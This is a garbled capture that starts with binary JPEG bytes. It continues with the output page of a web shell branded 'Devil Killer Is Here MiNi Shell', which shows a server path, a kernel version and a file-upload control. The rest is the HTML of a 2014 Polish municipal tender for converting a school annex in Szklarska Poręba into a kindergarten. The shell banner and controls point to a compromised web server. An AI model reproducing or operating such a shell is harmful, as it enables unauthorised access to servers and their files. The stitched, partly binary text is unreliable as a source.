JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140526/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140526/111913-N-2014.html

<p class="kh_header"><b>Szklarska Poręba: PRZEBUDOWA I ROZBUDOWA ŁĄCZNIKA BUDYNKU SP 1 
W SZKLARSKIEJ PORĘBIE Z PRZEZNACZENIEM NA PRZEDSZKOLE
-  I ETAP</b><br>
<b>Numer ogłoszenia: 111913 - 2014; data zamieszczenia: 26.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Szklarska Poręba , ul. M. Buczka 2, 58-580 Szklarska Poręba, woj. dolnośląskie, tel. 075 7547712, faks 075 7547724.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szklarskaporeba.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEBUDOWA I ROZBUDOWA ŁĄCZNIKA BUDYNKU SP 1 
W SZKLARSKIEJ PORĘBIE Z PRZEZNACZENIEM NA PRZEDSZKOLE
-  I ETAP.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  objętego niniejszym postępowaniem  jest  wyłącznie I ETAP, który obejmuje  przystosowanie części  I piętra budynku szkoły  tj. sal lekcyjnych i pomieszczeń towarzyszących, na potrzeby utworzenia przedszkola wraz z dobudową klatki schodowej. 
     
W ramach przebudowy  wykonane zostaną roboty budowlane polegające na: 
- odgrodzeniu placu budowy od sąsiedniej posesji panelami drewnianymi - w sposób nie powodujący żadnych  prześwitów, 
- adaptacji  2 sal lekcyjnych na sale przedszkolne, 
- utworzeniu 3 toalet, w tym jednej dla niepełnosprawnych,
- utworzeniu 2 szatni, 
- wykonaniu nowej klatki schodowej wraz z pozostałymi robotami budowlanymi w budynku szkoły
[ m.in.: roboty ziemne około(~)118m3,ławy i stopy fundamentowe ~3,5m3, ściany ~18,6m2, przewody spalinowe i dymowe z pustaków ceramicznych~22m, przewody wentylacyjne~7,2m2,komin~0,45m3, izolacje przeciwwilgociowe~27m2, izolacje cieplne - styropian ekstrudowany~16m2, podkłady, izolacje poziome, wylewki- ~17,3m2, ściany zew.~83,5m2,schody żelbet.~15m2, ściany ~wew. i działowe~161m2,  drewniana więźba dachowa~61m2,pokrycie dachu blachodachówką 61m2, okładziny z płyt gipsowo-karton.~84,1m2, tynki~451,5m2, licowanie płytkami ściennymi~63m2, posadzki z płytek~371m2 +cokoliki~421m, okładziny schodów~27,6m2+cokoliki~36m, malowanie~453,5m2, wyprawa ~83,5m2elewacyjna , nawierzchnia z kostki brukowej~65m2,
- wymianie  stolarki drzwiowej ~22,4m2,
- wymianie instalacji elektrycznej  w tym m.in.: rury i przewody~140m, tablica, instalacja oświetleniowa:  przewody~492m, oprawy~ 28szt.,  instalacja gniazd wtykowych: przewody~78m, 
- wymianie kanalizacji sanitarnej  w tym m.in.: rurociągi~38m, umywalki~5szt., brodziki~2szt.,ustępy~3szt.
- wymianie  instalacji  wodnej  w tym m.in.:  rurociągi~69m, zawory~10szt., baterie~7szt.


- modernizacji  instalacji centralnego ogrzewania w tym m.in.:  rurociągi miedziane~21m, grzejniki stalowe ~7szt.,
- dostosowaniu części budynku objętej zakresem opracowania do obowiązujących przepisów p.poż.,  w tym m.in. wykonanie instalacji hydrantowej oraz systemu p.poż. dla oddymiania klatki schodowej,
Zestawienie powierzchni:

Powierzchnia całkowita części I piętra budynku objętej opracowaniem - 370,7m2
Kubatura części I piętra budynku objętej opracowaniem - 1071,3m3
Powierzchnia zabudowy nowo projektowanej klatki schodowej - 26,1m2
Kubatura nowo projektowanej klatki schodowej - 144,3m3.
W tym:
Sala nr 1            		   -  73,80m2
Toalety               		   -  12,50m2
Szatnia               		   -  13,80m2
Komunikacja      		   -    5,00 m2
Komunikacja       		   -  11,90 m2
Pomieszczenia socjalne 	   -    8,50 m2
Szatnia			   -  16,0 0m2
Toaleta			   -    8,10 m2
Toaleta 			    -   5,60 m2
Sala nr 2                                    - 68,20 m2
Klatka schodowa                     - 21,30 m2
_______________________________________
                                           Razem             245,40 m2

Ww. zakres rzeczowy robót budowlanych ma jedynie charakter poglądowy i nie stanowi podstawy do określenia umownej ceny.  Szczegółowy opis przedmiotu zamówienia zawarty jest w Części III. Specyfikacji Istotnych Warunków Zamówienia pn. Opis przedmiotu zamówienia, ogólnie zwanym Dokumentacją projektową.
Wymagany okres gwarancji jakości  dla całego przedmiotu zamówienia  - minimum 60 miesięcy , licząc od dnia podpisania  bezusterkowego protokołu odbioru przedmiotu zamówienia.
Okres rękojmi za wady fizyczne obiektu, zgodnie z uregulowaniem ustawy K.c., wynosi 36 miesięcy od dnia podpisania  bezusterkowego protokołu odbioru przedmiotu zamówienia.

Zamawiający, w oparciu o art. 36a. ust.2 upzp, żąda  osobistego wykonania przez wykonawcę  kluczowej części zamówienia, przez którą należy rozumieć:  wszystkie roboty budowlane objęte zakresem rzeczowym     I Etapu z wyłączeniem:  robót rozbiórkowych,  prac pomiarowych, więźby drewnianej,  robót dekarskich            z pokryciem  połaci dachowej  włącznie,  robót tynkarskich, robót posadzkarskich, robót elektrycznych.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.26.27.00-8, 45.11.00.00-1, 45.11.12.20-6, 45.26.25.00-6, 45.40.00.00-1, 45.42.00.00-7, 45.42.11.41-4, 45.43.00.00-0, 45.44.21.00-8, 45.45.00.00-6, 45.30.00.00-0, 45.31.10.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Każdy wykonawca zobowiązany jest zabezpieczyć składaną ofertę wadium w wysokości  5 000  zł   
       (słownie:  pięć tysięcy złotych). 

2. Wadium może być wniesione w następujących formach:
(a)	pieniądzu,
(b)	   poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej z  tym, że  poręczenie  kasy jest zawsze poręczeniem pieniężnym,  
(c)	gwarancjach bankowych,
(d)	gwarancjach ubezpieczeniowych,


(e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia  09.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity z 2007r. Dz. U. Nr 42, poz. 275, z późniejszymi zmianami).

3. W przypadku składania przez wykonawcę wadium w formie gwarancji - gwarancja powinna być sporządzona
    zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
(a)	nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji ( Zamawiającego),  gwaranta ( banku lub
       instytucji ubezpieczeniowej udzielających gwarancji ) oraz wskazanie ich siedzib,
(b)	określenie wierzytelności, która ma być zabezpieczona gwarancją,
(c)	 kwotę gwarancji,
(d)	termin ważności gwarancji,
(e)	zobowiązanie gwaranta do bezwarunkowego zapłacenia kwoty gwarancji na pierwsze pisemne żądanie
         Zamawiającego zawierające oświadczenie :
       - że wykonawca, w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 upzp.  nie złożył      
         dokumentów lub oświadczeń, o których mowa w art.25.ust.1 upzp. lub  pełnomocnictw, a nie udowodnił, że nie wynikało to z przyczyn leżących po jego stronie
lub
     że wykonawca,  którego ofertę wybrano:
- odmówił podpisania umowy na warunkach określonych w ofercie         lub
- nie wniósł zabezpieczenia należytego wykonania umowy                          lub
- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy.

    Postanowienia pkt  3. stosuje się również do poręczeń, określonych w pkt 2.b) i 2.e).

4.  Wadium wnoszone w pieniądzu należy wpłacić  -  wyłącznie przelewem - na rachunek Zamawiającego, otwarty                 
      w  PLN:  Bank Zachodni WBK S.A. 1 Oddział  w Szklarskiej Porębie -  nr 68 1090 1984 0000 0001 0081 6338        z adnotacją w tytule wpłaty :   Wadium - łącznik SP1_I Etap.                                                               

5.	Wadium wnoszone w innej, niż  pieniądz  dopuszczonej przez Zamawiającego formie _formach wykonawca wnosi do Zamawiającego przy czym, w takim przypadku za termin doręczenia uważa się datę jego zdepono-
      -wania u Kierownika Referatu Inwestycji Miejskich i Gospodarki Komunalnej -  budynek  Urzędu Miasta  Szklarska Poręba - II piętro  lub  innej, wskazanej  osoby w ww. Referacie.

6.	Wadium w innej  formie (formach) niż  pieniądz  dopuszczonej  przez Zamawiającego, wykonawca może  dołączyć do Oferty pod warunkiem,  że umieszczone zostanie w osobnej kopercie opisanej (nazwa wykonawcy adnotacja: Wadium- łącznik_I Etap,  w sposób umożliwiający Zamawiającemu jego zdeponowanie       u  Osoby, o której mowa  w punkcie 5.,  bez konieczności naruszenia  koperty , w której znajduje się oferta.

7.  Wadium należy wnieść przed upływem terminu do składania ofert, przy czym wniesienie wadium  w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne wówczas, gdy Bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu  składania ofert. 
      Dołączenie do oferty kopii polecenia przelewu wystawionego przez wykonawcę jest nie wystarczającym warunkiem do stwierdzenia terminowego wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest do przedłożenia wykazu  wykonanych robót budowlanych w okresie ostatnich 5 lat przed upływem terminu  składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz  z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz                   z załączeniem dowodów dotyczących najważniejszych robót określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących czy zostały wykonane zgodnie  z zasadami sztuki budowlanej i prawidłowo ukończone. 
                Decyzja, które  roboty budowlane widniejące w ww. Wykazie są najważniejsze, pozostawiona jest   Wykonawcy, z zastrzeżeniem treści zdania następnego.

Zamawiający uzna warunek za spełniony w oparciu o   złożone przez Wykonawcę stosowne oświadczenie       i wykazane w ww. Wykazie realizacje, z których co najmniej dwie(2) dotyczą robót budowlanych                o wartości minimum 300 000 zł (łącznie z VAT), polegających na  budowie  lub przebudowie lub remoncie budynków, w tym co najmniej jedna (1) z zakresem robót budowlanych: roboty fundamentowe, roboty murowe, drewniana więźba dachowa, pokrycie połaci dachowej- blacha, roboty murowe, ocieplenie ścian, wyprawa elewacyjna, tynkowanie, malowanie, okładziny ścienne i podłogowe, wew. instalacje sanitarnej i instalacje elektryczne, i które zostały poparte  załączonymi dowodami określającymi, że  wskazane roboty budowlane  zostały wykonane w sposób należyty, zgodnie                    z zasadami sztuki budowlanej i prawidłowo ukończone. 
Ww. dowody muszą być wydane przez podmiot, na rzecz którego te roboty budowlane zostały wykonane.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien wskazać do uczestnictwa w wykonaniu niniejszego zamówienia w szczególności osoby odpowiedzialne za kierowanie robotami budowlanymi:
a)	Kierownika Budowy   posiadającego :
        - uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów;      
       

       -    odbytą co najmniej   dwuletnią (2)  praktykę zawodową na budowie przy zabytkach nieruchomych wpisanych do rejestru zabytków;

b)	 Kierownika robót lub majstra robót posiadającego: 
 -  uprawnienia  budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej                  w zakresie sieci, instalacji i urządzeń cieplnych,  wentylacyjnych, gazowych, wodociągowych                       i kanalizacyjnych  lub odpowiadające im ważne  uprawnienia budowlane,  które zostały wydane na podstawie wcześniej wydanych przepisów w zakresie instalacji i urządzeń wodociągowych                          i kanalizacyjnych
c)	Kierownika robót lub majstra robót,  posiadającego :
     -  uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej wydanych przepisów.

Zamawiający dopuszcza posiadanie uprawnień w ww. branżach przez jedną, dwie lub trzy osoby pod warunkiem, że zostaną odpowiednio wskazane do pełnienia funkcji , zgodnie z  zakresem odpowiadającym ich uprawnieniom.
Jeżeli wskazana wyżej osoba jest  obywatelem państw członkowskich Unii Europejskiej i nabyła w tych państwach, poza granicami Rzeczypospolitej Polskiej, kwalifikacje zawodowe do wykonywania samodzielnych funkcji w budownictwie, mając na względzie obowiązujące w Polsce przepisy prawa krajowego wymagane jest od tej osoby uznanie jej kwalifikacji zawodowych.


Zamawiający uzna warunek za spełniony w oparciu o  złożone przez Wykonawcę stosowne oświadczenia      i  wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże: 
a)	dysponowanie środkami finansowymi lub posiadaną zdolnością kredytową (lub środkami finansowymi i zdolnością kredytową)  - w wysokości co najmniej 200 000  PLN ;

b)	że jest ubezpieczony od odpowiedzialności cywilnej  w zakresie prowadzonej działalności związanej   z przedmiotem zamówienia na kwotę minimum 300 000 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>co najmniej dwie(2) realizacje  dotyczą robót budowlanych                o wartości minimum 300 000 zł (łącznie z VAT), polegających na  budowie  lub przebudowie lub remoncie budynków, w tym co najmniej jedna (1) z zakresem robót budowlanych: roboty fundamentowe, roboty murowe, drewniana więźba dachowa, pokrycie połaci dachowej- blacha, roboty murowe, ocieplenie ścian, wyprawa elewacyjna, tynkowanie, malowanie, okładziny ścienne i podłogowe, wew. instalacje sanitarnej i instalacje elektryczne, i które zostały poparte  załączonymi dowodami określającymi, że  wskazane roboty budowlane  zostały wykonane w sposób należyty, zgodnie                    z zasadami sztuki budowlanej i prawidłowo ukończone.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli Wykonawca, wykazując spełnienie warunków , o których mowa w art.22.ust.1 upzp, polega na zasobach innych podmiotów na zasadach określonych w art.26 ust.2b upzp, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów żąda:

(a)	pisemnego zobowiązania innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na       
   okres korzystania z nich przy wykonywaniu zamówienia - wg wzoru stanowiącego Załącznik nr 7;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający  przewiduje możliwość zmiany zawartej  umowy w przypadku :

(a)	zmiany kluczowego personelu wykonawcy wskazanego w ofercie do realizacji przedmiotu zamówienia, wyłącznie w przypadkach losowych,  na  osobę (y)  spełniającą (e) co najmniej warunki podmiotowe określone w Cz. I IDW,
(b)	zmiana lub konieczność  dodatkowego wprowadzenia na plac budowy - podwykonawcy lub dalszego   podwykonawcy lub między dalszymi podwykonawcami.
(c)	rezygnacji z wykonania pełnego zakresu rzeczowego objętego zamówieniem w przypadku zaistnienia  okoliczności, w których zbędne będzie wykonanie danej części zamówienia, 
 (d)   wprowadzenia robót zamiennych podczas realizacji umowy wynikających z rzeczywistych warunków występujących w   trakcie realizacji prac, których zakres rzeczowy nie wykracza poza zakres opisany             w Dokumentacji projektowej,





  (e) konieczności zrealizowania zamówienia przy zastosowaniu innych rozwiązań technicznych, technologicznych lub materiałowych niż wskazane w Dokumentacji projektowej  w sytuacji,  gdyby zastosowanie dotychczasowych rozwiązań groziłoby nie wykonaniem lub wadliwym wykonaniem zamówienia.

